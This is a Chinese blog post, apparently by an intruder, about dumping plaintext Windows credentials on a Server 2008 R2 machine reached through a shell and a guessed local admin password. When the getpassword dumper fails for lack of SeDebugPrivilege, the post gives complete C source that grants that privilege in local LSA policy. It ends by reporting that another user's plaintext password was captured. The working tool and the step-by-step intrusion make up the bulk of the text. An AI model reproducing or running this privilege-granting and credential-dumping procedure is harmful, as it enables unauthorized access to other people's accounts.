人品好猜到了08r2某个本地管理员的密码,shell下runas执行getpassword却返回以下错误信息:
Authentication Id:0;6798000
Authentication Package:Negotiate
Primary User:administrator
Authentication Domain:xxx
OpenProcess : (0x00000005) 拒绝访问.
n.a. (wdigest Error)
开始以为是UAC问题,执行whoami /all查看管理员组,显示为启用状态,Mandatory Label也是过了UAC的High。
BUILTIN/Administrators Alias S-1-5-32-544 必需的组, 启用于默认, 启用的组, 组的所有者
Mandatory Label/High Mandatory Level Label S-1-16-12288 必需的组, 启用于默认, 启用的组
之后注意到特权列表中居然没有SeDebugPrivilege,这服务器竟然把默认情况下administrators的Debug特权删掉了。翻了翻存档,找到了这段代码(前人之作,忘记出处是哪里了):
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <wchar.h>
#include <windows.h>
#include <ntsecapi.h>
/* Native status type returned by the Lsa* policy calls used below. */
typedef LONG NTSTATUS;
/* A status is treated as success when it is non-negative. (Currently unused.) */
#define NT_SUCCESS(status) (((NTSTATUS)(status)) >= 0)
/* The only status value the helpers below accept from LsaOpenPolicy/LsaAddAccountRights. */
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
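/*
 * Print "<message>: <system text>" for a Win32 error code on stdout.
 *
 * message     - caller-supplied prefix; printed through "%s", never as a format string.
 * dwMessageId - Win32 error code, e.g. from GetLastError() or LsaNtStatusToWinError().
 *
 * FormatMessageA is called explicitly so the allocated buffer is narrow text
 * matching `char *` whether or not UNICODE is defined for the build.
 * FORMAT_MESSAGE_IGNORE_INSERTS is set because no insert arguments are supplied.
 * If no text is available for the code, the numeric code is printed instead;
 * the original dereferenced an uninitialized pointer on that path.
 */
static void PrintWin32Error(const char *message, DWORD dwMessageId)
{
    char *errMsg = NULL;
    DWORD len;

    len = FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM
                             | FORMAT_MESSAGE_IGNORE_INSERTS,
                         NULL, dwMessageId,
                         MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
                         (LPSTR)&errMsg, 0, NULL);
    if (len == 0 || errMsg == NULL) {
        /* No message text for this code: fall back to the number so nothing is lost. */
        printf("%s: error %lu\n", message, (unsigned long)dwMessageId);
        return;
    }
    printf("%s: %s", message, errMsg);
    LocalFree(errMsg);
}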
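/*
 * Query one TOKEN_INFORMATION_CLASS from a token into a freshly allocated buffer.
 *
 * TokenHandle           - token opened with at least TOKEN_QUERY.
 * TokenInformationClass - which class to retrieve; the caller casts the result
 *                         to the matching structure (e.g. PTOKEN_USER for TokenUser).
 *
 * Returns a calloc'd buffer the caller must free(), or NULL on failure after
 * an error has been printed. Uses the two-call pattern: the first call with a
 * NULL buffer is expected to fail with ERROR_INSUFFICIENT_BUFFER and report
 * the required size in `needed`.
 */
static PVOID GetFromToken(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass)
{
    DWORD needed = 0;
    PVOID buf = NULL;

    if (!GetTokenInformation(TokenHandle, TokenInformationClass, NULL, 0, &needed)) {
        DWORD error = GetLastError();
        if (error != ERROR_INSUFFICIENT_BUFFER) {
            PrintWin32Error("GetTokenInformation() failed", error);
            return NULL;
        }
    }
    if (needed == 0) {
        /* calloc(0, 1) may legally return NULL or a non-NULL pointer; refuse explicitly. */
        fprintf(stderr, "GetTokenInformation() reported zero bytes needed\n");
        return NULL;
    }
    buf = calloc(needed, 1);
    if (buf == NULL) {
        /* DWORD is an unsigned long on Windows; cast keeps the format specifier honest. */
        fprintf(stderr, "calloc(%lu,1) failed\n", (unsigned long)needed);
        return NULL;
    }
    if (!GetTokenInformation(TokenHandle, TokenInformationClass, buf, needed, &needed)) {
        PrintWin32Error("GetTokenInformation() failed", GetLastError());
        free(buf);
        return NULL;
    }
    return buf;
}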
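/*
 * Grant one account right / privilege to an account in the local LSA policy.
 *
 * PolicyHandle  - handle from LsaOpenPolicy with the access LsaAddAccountRights needs.
 * AccountSid    - SID of the account to modify.
 * PrivilegeName - NUL-terminated privilege name, e.g. L"SeDebugPrivilege".
 *
 * Returns TRUE on success, FALSE on failure (the error has been printed) or
 * when PrivilegeName is NULL or too long for an LSA_UNICODE_STRING.
 *
 * NOTE: this writes to the machine's persistent user-rights policy for the
 * account; it does not alter the caller's existing token (the page re-runs
 * runas, i.e. a fresh logon, afterwards). The entry remains until removed,
 * e.g. with LsaRemoveAccountRights, and is visible in Local Security Policy,
 * which matters both for cleanup and for anyone auditing rights assignments.
 */
static BOOL AddPrivilege(LSA_HANDLE PolicyHandle, PSID AccountSid, LPWSTR PrivilegeName)
{
    LSA_UNICODE_STRING UserRights;
    size_t chars;
    NTSTATUS status;

    if (PrivilegeName == NULL) {
        return FALSE;
    }
    chars = wcslen(PrivilegeName);
    /* Length/MaximumLength are USHORT byte counts: refuse instead of silently
     * truncating (the original assigned wcslen() straight into a USHORT). */
    if (chars >= USHRT_MAX / sizeof(WCHAR)) {
        fprintf(stderr, "AddPrivilege: privilege name too long\n");
        return FALSE;
    }
    UserRights.Buffer = PrivilegeName;
    UserRights.Length = (USHORT)(chars * sizeof(WCHAR));
    UserRights.MaximumLength = (USHORT)((chars + 1) * sizeof(WCHAR));

    status = LsaAddAccountRights(PolicyHandle, AccountSid, &UserRights, 1);
    if (status != STATUS_SUCCESS) {
        PrintWin32Error("LsaAddAccountRights() failed", LsaNtStatusToWinError(status));
        return FALSE;
    }
    return TRUE;
}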
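/*
 * Look up the SID of the user owning the current process token and grant that
 * account the named right in the local LSA policy.
 *
 * PrivilegeName - privilege to grant, e.g. L"SeDebugPrivilege".
 *
 * Returns TRUE on success, FALSE on failure (the error has been printed).
 *
 * Despite the name, the current process token is only read (TOKEN_QUERY) to
 * find the SID; the right is written to the policy database and applies to
 * tokens created by later logons. LsaOpenPolicy is expected to fail for
 * callers that are not allowed to modify local policy.
 */
static BOOL AddCurrentProcessPrivilege(LPWSTR PrivilegeName)
{
    BOOL ret = FALSE;
    LSA_HANDLE PolicyHandle = NULL;
    HANDLE CurrentProcessToken = NULL;
    PTOKEN_USER token_user = NULL;
    LSA_OBJECT_ATTRIBUTES ObjectAttributes;
    NTSTATUS status;

    ZeroMemory(&ObjectAttributes, sizeof(ObjectAttributes));
    /* Least privilege: LsaAddAccountRights needs POLICY_LOOKUP_NAMES and
     * POLICY_CREATE_ACCOUNT on the policy handle; POLICY_ALL_ACCESS (the
     * original request) is far broader than anything used here. */
    status = LsaOpenPolicy(NULL, &ObjectAttributes,
                           POLICY_LOOKUP_NAMES | POLICY_CREATE_ACCOUNT, &PolicyHandle);
    if (status != STATUS_SUCCESS) {
        PrintWin32Error("LsaOpenPolicy() failed", LsaNtStatusToWinError(status));
        goto cleanup;
    }
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &CurrentProcessToken)) {
        PrintWin32Error("OpenProcessToken() failed", GetLastError());
        goto cleanup;
    }
    token_user = (PTOKEN_USER)GetFromToken(CurrentProcessToken, TokenUser);
    if (token_user == NULL) {
        goto cleanup; /* GetFromToken has already printed the error */
    }
    if (!AddPrivilege(PolicyHandle, token_user->User.Sid, PrivilegeName)) {
        goto cleanup; /* AddPrivilege has already printed the error */
    }
    ret = TRUE;

cleanup:
    /* free(NULL) is a no-op; the handle releases still need their guards. */
    free(token_user);
    if (CurrentProcessToken != NULL) {
        CloseHandle(CurrentProcessToken);
    }
    if (PolicyHandle != NULL) {
        LsaClose(PolicyHandle);
    }
    return ret;
}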
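/*
 * Entry point: grants SeDebugPrivilege to the account owning this process in
 * the local policy and prints "ok" or "err". Exit status is 0 on success and
 * 1 on failure so the result is usable from scripts as well as by eye.
 */
int main(void)
{
    if (AddCurrentProcessPrivilege(L"SeDebugPrivilege")) {
        printf("ok\n");
        return 0;
    }
    printf("err\n");
    return 1;
}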
添加特权之后再次runas执行,成功抓取到另一用户的明文。
【via@草泥马之家】